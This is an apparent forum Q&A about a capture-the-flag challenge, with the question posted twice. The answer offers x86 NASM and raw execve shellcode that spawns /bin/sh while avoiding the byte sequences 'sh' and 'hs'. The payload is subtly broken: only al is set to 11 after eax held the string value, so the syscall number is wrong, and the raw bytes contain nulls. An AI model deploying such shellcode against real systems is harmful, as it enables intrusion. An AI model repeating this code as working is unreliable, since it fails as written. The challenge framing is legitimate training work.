I am doing a cybersecurity challenge and need to open a shell using shellcode.
The usual shellcode is \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\x50\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80 but the binary that executes it checks that it does not contain the sequence "sh" or "hs". As I am new to shellcoding, I struggle to find the solution. Can someone help me with that ? Thanks in advance
I am doing a cybersecurity challenge and need to open a shell using shellcode.
The usual shellcode is \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\x50\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80 but the binary that executes it checks that it does not contain the sequence "sh" or "hs". As I am new to shellcoding, I struggle to find the solution. Can someone help me with that ? Thanks in advance
Instead of directly embedding 0x68732f2f (which in little endian is "2f 2f 73 68", containing sh), we load 0x69732f2f (which becomes //si) and then subtract 0x01000000 to "fix" the high byte. Below is the NASM example:
section .text
global _start
_start:
xor eax, eax ; zero eax
push eax ; push null terminator
mov eax, 0x69732f2f ; load 0x69732f2f (bytes: 2f 2f 73 69)
sub eax, 0x01000000 ; subtract 0x01000000 => eax becomes 0x68732f2f (bytes: 2f 2f 73 68)
push eax ; push "//sh" onto the stack
push dword 0x6e69622f ; push "/bin" onto the stack
mov ebx, esp ; ebx now points to "/bin//sh"
xor ecx, ecx ; argv = NULL
xor edx, edx ; envp = NULL
mov al, 0xb ; syscall number 11 (execve)
int 0x80 ; make kernel call
And here's the raw shellcode (29 bytes):
\x31\xc0\x50\xb8\x2f\x2f\x73\x69\x2d\x00\x00\x00\x01\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80